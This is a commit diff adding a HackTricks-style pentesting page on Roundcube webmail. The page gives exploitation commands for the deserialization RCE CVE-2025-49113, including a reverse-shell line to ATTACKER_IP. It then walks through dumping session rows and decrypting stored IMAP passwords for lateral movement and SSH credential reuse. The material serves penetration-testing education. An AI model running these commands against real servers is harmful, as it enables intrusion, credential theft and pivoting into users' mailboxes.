f

carlospolop · carlospolop · commit fe196295af47 · 2025-11-21T10:12:10.000+01:00
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -489,6 +489,7 @@
   - [Special HTTP headers$$external:network-services-pentesting/pentesting-web/special-http-headers.md$$]()
   - [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
   - [Special Http Headers](network-services-pentesting/pentesting-web/special-http-headers.md)
+  - [Roundcube](network-services-pentesting/pentesting-web/roundcube.md)
   - [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
   - [Symfony](network-services-pentesting/pentesting-web/symphony.md)
   - [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md
@@ -95,6 +95,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 - [**Nginx**](nginx.md)
 - [**PHP (php has a lot of interesting tricks that could be exploited)**](php-tricks-esp/index.html)
 - [**Python**](python.md)
+- [**Roundcube**](roundcube.md)
 - [**Spring Actuators**](spring-actuators.md)
 - [**Symphony**](symphony.md)
 - [**Tomcat**](tomcat/index.html)
diff --git a/src/network-services-pentesting/pentesting-web/roundcube.md b/src/network-services-pentesting/pentesting-web/roundcube.md
@@ -0,0 +1,116 @@
+# Roundcube
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Overview
+
+Roundcube is a PHP webmail client commonly exposed on HTTP(S) vhosts (e.g., mail.example.tld). Useful fingerprints:
+- HTML source often leaks rcversion (e.g., window.rcmail && rcmail.env.rcversion)
+- Default app path in containers/VMs: /var/www/html/roundcube
+- Main config: config/config.inc.php
+
+## Authenticated RCE via PHP object deserialization (CVE-2025-49113)
+
+Affected versions (per vendor/NVD):
+- 1.6.x before 1.6.11
+- 1.5.x before 1.5.10
+
+Bug summary
+- The _from parameter in program/actions/settings/upload.php is not validated, enabling injection of attacker‑controlled data that Roundcube later unserializes, leading to gadget chain execution and remote code execution in the web context (post‑auth).
+
+Quick exploitation
+- Requirements: valid Roundcube credentials and a reachable UI URL (e.g., http://mail.target.tld)
+- Public PoC automates session handling, gadget crafting and upload flow
+
+```bash
+git clone https://github.com/hakaioffsec/CVE-2025-49113-exploit.git
+php CVE-2025-49113.php http://mail.target.tld USER PASS CMD
+
+# examples
+php CVE-2025-49113.php http://mail.target.tld user 'pass' "id"
+# blind timing proof
+time php CVE-2025-49113.php http://mail.target.tld user 'pass' "sleep 5"
+
+# reverse shell
+nc -nvlp 443
+php CVE-2025-49113.php http://mail.target.tld user 'pass' \
+  "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'"
+```
+
+Notes
+- Output is often blind; use sleep N to validate RCE
+- Resulting shell typically runs as www-data; on containerised deployments expect /.dockerenv and 172.17.0.0/16 networking
+
+## Post‑exploitation: recover IMAP passwords from Roundcube sessions
+
+Roundcube stores the current user’s IMAP password in the session (database) encrypted with the server‑side 3DES key configured in config.inc.php. With filesystem or DB access on the Roundcube host you can recover plaintext passwords and pivot into other mailboxes/services (SSH reuse is common).
+
+1) Read DB DSN and 3DES key from config
+
+config/config.inc.php typically contains:
+
+```php
+$config['db_dsnw'] = 'mysql://roundcube:DB_PASS@localhost/roundcube';
+$config['des_key'] = 'rcmail-!24ByteDESkey*Str'; // 24‑byte key (3DES)
+```
+
+2) Connect to DB and dump sessions
+
+```bash
+mysql -u roundcube -p roundcube
+# or: mysql -u roundcube -pDB_PASS roundcube
+
+mysql> SELECT id, created, changed, vars FROM session\G
+```
+
+The session.vars field is a Base64 blob produced by Roundcube’s encrypt(): Base64( IV || 3DES-CBC(plaintext) ). The first 8 bytes after Base64‑decoding are the IV.
+
+3) Locate the password field
+
+A quick way to spot the credential inside the decrypted structure is to first Base64‑decode the vars field and eyeball serialized entries:
+
+```bash
+echo 'BASE64_FROM_VARS' | base64 -d | tr ';' '\n' | grep -i password
+```
+
+4) Decrypt using Roundcube’s helper
+
+Roundcube ships a CLI that uses the same rcmail->decrypt() logic and the configured des_key:
+
+```bash
+cd /var/www/html/roundcube
+./bin/decrypt.sh CIPHERTEXT_BASE64
+# -> prints plaintext
+```
+
+5) Manual 3DES-CBC decryption (optional)
+
+- Ciphertext format: Base64( IV(8B) || CT )
+- Alg: 3DES-CBC, key length 24B, PKCS#7 padding
+
+```python
+from base64 import b64decode
+iv_ct = b64decode('hcVCSNXOYgUXvhArn1a1OHJtDck+CFME')
+iv, ct = iv_ct[:8], iv_ct[8:]
+print(iv.hex(), ct.hex())
+# decrypt(ct) with key = $config['des_key'], IV = iv
+```
+
+Common locations
+- DB table: session (users table maps login names to IDs)
+- Config path: /var/www/html/roundcube/config/config.inc.php
+
+Operational use
+- Older session rows often contain prior users’ IMAP passwords; decrypt multiple entries to laterally move into other mailboxes
+- Try recovered credentials against SSH or other services if credential reuse is suspected
+
+## References
+
+- [Roundcube security updates 1.6.11 and 1.5.10](https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10)
+- [CVE-2025-49113 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-49113)
+- [FearsOff research notes on Roundcube deserialization/RCE](https://fearsoff.org/research/roundcube)
+- [hakaioffsec/CVE-2025-49113-exploit (PoC)](https://github.com/hakaioffsec/CVE-2025-49113-exploit)
+- [Roundcube bin/decrypt.sh helper](https://raw.githubusercontent.com/roundcube/roundcubemail/master/bin/decrypt.sh)
+- [HTB Outbound – 0xdf write‑up (Roundcube 1.6.10 → RCE → session decrypt pivot)](https://0xdf.gitlab.io/2025/11/15/htb-outbound.html)
+
+{{#include ../../banners/hacktricks-training.md}}
